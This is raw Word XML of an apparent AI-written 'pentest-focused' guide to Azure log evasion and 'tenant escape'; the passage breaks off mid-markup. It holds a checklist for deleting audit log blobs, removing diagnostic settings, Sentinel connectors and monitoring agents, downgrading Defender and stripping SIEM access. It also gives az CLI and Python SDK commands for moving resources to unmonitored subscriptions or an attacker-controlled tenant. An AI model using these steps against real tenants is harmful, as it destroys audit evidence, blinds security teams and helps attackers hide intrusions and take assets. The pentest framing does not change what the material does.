    <w:p w14:paraId="041C607F" w14:textId="77777777" w:rsidR="00061F5E" w:rsidRPr="002B73BB" w:rsidRDefault="00061F5E" w:rsidP="00061F5E">
      <w:r w:rsidRPr="002B73BB">
        <w:t>Write-Host "[*] Evasion steps complete. Monitor for alerts or recovery policies." -ForegroundColor Green</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FAE9E29" w14:textId="1A295CD5" w:rsidR="00061F5E" w:rsidRPr="002B73BB" w:rsidRDefault="00061F5E" w:rsidP="00061F5E"/>
    <w:p w14:paraId="78F6634F" w14:textId="77777777" w:rsidR="00061F5E" w:rsidRDefault="00061F5E" w:rsidP="00061F5E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B73BB">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>📋</w:t>
      </w:r>
      <w:r w:rsidRPr="002B73BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Azure Log Evasion Checklist (Tool-Agnostic)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="249243F9" w14:textId="77777777" w:rsidR="00B5593C" w:rsidRPr="002B73BB" w:rsidRDefault="00B5593C" w:rsidP="00061F5E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6315"/>
      </w:tblGrid>
      <w:tr w:rsidR="00061F5E" w:rsidRPr="00B5593C" w14:paraId="49FCFF4A" w14:textId="77777777" w:rsidTr="00B5593C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1F4CB46E" w14:textId="77777777" w:rsidR="00061F5E" w:rsidRPr="00B5593C" w:rsidRDefault="00061F5E" w:rsidP="001E6B7C">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B5593C">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Tactic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5CB294A2" w14:textId="77777777" w:rsidR="00061F5E" w:rsidRPr="00B5593C" w:rsidRDefault="00061F5E" w:rsidP="001E6B7C">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B5593C">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00061F5E" w:rsidRPr="00B5593C" w14:paraId="377E330A" w14:textId="77777777" w:rsidTr="00B5593C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="09DA9E11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Remove Diagnostic Settings</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="22EEA009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Stop logs from flowing to Log Analytics or Event Hub.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00061F5E" w:rsidRPr="00B5593C" w14:paraId="6910A470" w14:textId="77777777" w:rsidTr="00B5593C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F78E231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Downgrade Defender for Cloud</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5B8A70A7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 xml:space="preserve">Switch from </w:t>
            </w:r>
            <w:r w:rsidRPr="00B5593C">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Standard</w:t>
            </w:r>
            <w:r w:rsidRPr="00B5593C">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> to </w:t>
            </w:r>
            <w:r w:rsidRPr="00B5593C">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Free</w:t>
            </w:r>
            <w:r w:rsidRPr="00B5593C">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> tier to stop advanced protection.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00061F5E" w:rsidRPr="00B5593C" w14:paraId="74D6F412" w14:textId="77777777" w:rsidTr="00B5593C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E813A80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Delete Sentinel Data Connectors</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7EAE03DB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Cuts off data sources like Office 365, AAD, or custom logs.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00061F5E" w:rsidRPr="00B5593C" w14:paraId="4F8421C1" w14:textId="77777777" w:rsidTr="00B5593C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="755E5F21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Delete Log Blobs (Storage-based logging)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="40747A49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Directly delete audit logs in insights-logs-* containers.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00061F5E" w:rsidRPr="00B5593C" w14:paraId="373437FF" w14:textId="77777777" w:rsidTr="00B5593C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1B0FBDC9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Obfuscate CLI/Script Environment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="45F0853C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Set custom User-Agent to avoid OS-level telemetry (Kali, Parrot, etc).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00061F5E" w:rsidRPr="00B5593C" w14:paraId="70669859" w14:textId="77777777" w:rsidTr="00B5593C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="69550C5F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Interfere with Monitoring Agents</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7EC89770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Disable/remove AzureMonitorAgent or LogAnalyticsAgent from VMs.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00061F5E" w:rsidRPr="00B5593C" w14:paraId="6F859996" w14:textId="77777777" w:rsidTr="00B5593C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2AEF877E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Disable Role Assignments to SIEM Accounts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="422DBBAC" w14:textId="77777777" w:rsidR="00061F5E" w:rsidRPr="00B5593C" w:rsidRDefault="00061F5E" w:rsidP="001E6B7C">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B5593C">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Remove reader/monitoring access granted to Sentinel/Defender.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7362031B" w14:textId="1A4668A6" w:rsidR="00061F5E" w:rsidRPr="002B73BB" w:rsidRDefault="00061F5E" w:rsidP="00061F5E"/>
    <w:p w14:paraId="4F95528F" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:r w:rsidRPr="003718E3">
        <w:t xml:space="preserve">Here’s a </w:t>
      </w:r>
      <w:r w:rsidRPr="003718E3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>corrected and Azure-realistic pentest-focused rewrite</w:t>
      </w:r>
      <w:r w:rsidRPr="003718E3">
        <w:t xml:space="preserve"> (aligned with actual control planes, RBAC, and abuse scenarios rather than unsupported actions):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E8D141D" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:r w:rsidRPr="003718E3">
        <w:pict w14:anchorId="7FD9DE30">
          <v:rect id="_x0000_i1026" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7549600B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Azure Pentest Scenario: Tenant Escape &amp; Log Evasion Techniques</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF67917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1. Attempting to Leave / Disassociate from Azure Tenant (Realistic Abuse Cases)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C901AD4" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:r w:rsidRPr="003718E3">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>⚠️</w:t>
      </w:r>
      <w:r w:rsidRPr="003718E3">
        <w:t xml:space="preserve"> In Azure, </w:t>
      </w:r>
      <w:r w:rsidRPr="003718E3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>subscriptions cannot be “unsubscribed” via CLI/API</w:t>
      </w:r>
      <w:r w:rsidRPr="003718E3">
        <w:t xml:space="preserve"> like AWS accounts.</w:t>
      </w:r>
      <w:r w:rsidRPr="003718E3">
        <w:br/>
        <w:t xml:space="preserve">Instead, attackers simulate “tenant escape” by </w:t>
      </w:r>
      <w:r w:rsidRPr="003718E3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>moving, transferring, or orphaning subscriptions/resources</w:t>
      </w:r>
      <w:r w:rsidRPr="003718E3">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F622F0D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Attack Objectives</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B3DF43" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003718E3">
        <w:t>Evade governance (policies, Defender, Sentinel)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7388E980" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003718E3">
        <w:t>Move assets to attacker-controlled tenant</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6672BD5F" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003718E3">
        <w:t>Break visibility from central SOC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD7D8AD" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:r w:rsidRPr="003718E3">
        <w:pict w14:anchorId="642DDC35">
          <v:rect id="_x0000_i1027" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A045A8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A. Subscription Transfer / Directory Change (Realistic Vector)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="109D0B96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Azure CLI (Supported Operation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D22CE4" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:r w:rsidRPr="003718E3">
        <w:t>az account subscription show --subscription &lt;subscription_id&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="611117E5" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8"/>
    <w:p w14:paraId="67CE89C6" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:r w:rsidRPr="003718E3">
        <w:t># Change directory (tenant) context (if user has access)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79886C1C" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:r w:rsidRPr="003718E3">
        <w:t>az login --tenant &lt;target_tenant_id&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A85FB1" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:r w:rsidRPr="003718E3">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>🔍</w:t>
      </w:r>
      <w:r w:rsidRPr="003718E3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003718E3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Abuse Insight</w:t>
      </w:r>
      <w:r w:rsidRPr="003718E3">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="336BC3F9" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003718E3">
        <w:t xml:space="preserve">If attacker has </w:t>
      </w:r>
      <w:r w:rsidRPr="003718E3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Owner + billing permissions</w:t>
      </w:r>
      <w:r w:rsidRPr="003718E3">
        <w:t>, they may:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4849E38D" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003718E3">
        <w:t>Transfer subscription ownership (via billing portal, not CLI)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55AB7120" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003718E3">
        <w:t>Change Azure AD tenant association (restricted but high-impact)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D1FB324" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:r w:rsidRPr="003718E3">
        <w:pict w14:anchorId="4E65D85C">
          <v:rect id="_x0000_i1028" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="34282FBD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B. Resource Move to Evade Controls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04BC4054" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:r w:rsidRPr="003718E3">
        <w:t>az resource move \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44FC81C0" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:r w:rsidRPr="003718E3">
        <w:t xml:space="preserve">  --destination-group &lt;target_rg&gt; \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="260A752C" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:r w:rsidRPr="003718E3">
        <w:t xml:space="preserve">  --destination-subscription-id &lt;target_subscription_id&gt; \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3DEB54" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:r w:rsidRPr="003718E3">
        <w:t xml:space="preserve">  --ids &lt;resource_id&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3479E742" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:r w:rsidRPr="003718E3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Purpose (Pentest Context):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A99EA0" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003718E3">
        <w:lastRenderedPageBreak/>
        <w:t>Move critical resources to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D373D2F" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003718E3">
        <w:t>Unmonitored subscription</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B3324D8" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003718E3">
        <w:t>Different resource group without policies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6419341B" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003718E3">
        <w:t>Bypass:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F0CE25" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003718E3">
        <w:t>Azure Policy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72212F37" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003718E3">
        <w:t>Microsoft Sentinel scope</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1D3FA5" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003718E3">
        <w:t>Defender for Cloud protections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="431FA815" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:r w:rsidRPr="003718E3">
        <w:pict w14:anchorId="342A2BF9">
          <v:rect id="_x0000_i1029" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3080134F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C. Programmatic Subscription Abuse (Azure SDK)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C7183D5" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:r w:rsidRPr="003718E3">
        <w:t>from azure.mgmt.resource import ResourceManagementClient</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69DB5CD1" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:r w:rsidRPr="003718E3">
        <w:t>from azure.identity import DefaultAzureCredential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F84A0FC" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8"/>
    <w:p w14:paraId="3E209BF8" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:r w:rsidRPr="003718E3">
        <w:t>client = ResourceManagementClient(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040C4A52" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:r w:rsidRPr="003718E3">
        <w:t xml:space="preserve">    credential=DefaultAzureCredential(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668BDB5E" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:r w:rsidRPr="003718E3">
        <w:t xml:space="preserve">    subscription_id="&lt;subscription_id&gt;"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E6B8C1A" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:r w:rsidRPr="003718E3">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EEA8AF4" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8"/>
    <w:p w14:paraId="26E16D63" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:r w:rsidRPr="003718E3">
        <w:t># Example: move resources (not cancel subscription – restricted)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312E3207" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:r w:rsidRPr="003718E3">
        <w:t>client.resources.begin_move_resources(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5441FFD2" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:r w:rsidRPr="003718E3">
        <w:t xml:space="preserve">    source_resource_group_name="&lt;source_rg&gt;",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03000DDC" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:r w:rsidRPr="003718E3">
        <w:t xml:space="preserve">    parameters={</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="342059FC" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:r w:rsidRPr="003718E3">
        <w:t xml:space="preserve">        "resources": ["&lt;resource_id&gt;"],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5828E0B4" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:r w:rsidRPr="003718E3">
        <w:t xml:space="preserve">        "targetResourceGroup": "/subscriptions/&lt;target_sub&gt;/resourceGroups/&lt;target_rg&gt;"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33414729" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:r w:rsidRPr="003718E3">
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A53CDB4" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:r w:rsidRPr="003718E3">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C075C1E" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:r w:rsidRPr="003718E3">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>🔐</w:t>
      </w:r>
      <w:r w:rsidRPr="003718E3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003718E3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Reality Check</w:t>
      </w:r>
      <w:r w:rsidRPr="003718E3">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3165A9B1" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003718E3">
        <w:t xml:space="preserve">subscriptions.cancel() is </w:t>
      </w:r>
      <w:r w:rsidRPr="003718E3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>billing-restricted</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242BA705" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003718E3">
        <w:t>Cannot be executed by normal RBAC roles</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B33BBD" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:pPr>
        <w:numPr>
